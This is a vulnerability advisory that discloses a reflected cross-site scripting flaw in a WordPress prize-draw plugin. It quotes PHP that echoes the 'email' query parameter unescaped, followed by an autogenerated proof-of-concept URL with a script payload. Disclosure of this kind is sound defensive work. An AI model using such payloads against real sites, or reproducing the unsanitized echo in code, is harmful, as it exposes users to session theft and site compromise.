Advisory #: 277
Title: Reflected XSS in wordpress plugin no-frills-prize-draw v1.1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/no-frills-prize-draw
Downloads: 126
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: no-frills-prize-draw
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./no-frills-prize-draw/admin/nfpd-view-entrees-admin.php: 103: <form class='define' action="" method="get">Search by Email: <input type="text" name='email' value='<?php if(isset($_GET['email'])) echo $_GET['email'];?>' /><input type='hidden' name='page' value='nfpd_prize_draw_view_draw_entries'/> <?php if($realanswer!="") {?>Filter: <select id='filter' name='filter'><option value='0'>All</option><option value='1' <?php if(@$_GET['filter']=="1"){echo " selected";}?>>Only Correct Entries</option></select><?php } ?> <input type="submit" value='Refine results' class='button' /></form> The variable email appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./no-frills-prize-draw/admin/nfpd-view-entrees-admin.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/no-frills-prize-draw/admin/nfpd-view-entrees-admin.php?email="><script>alert(1);</script><"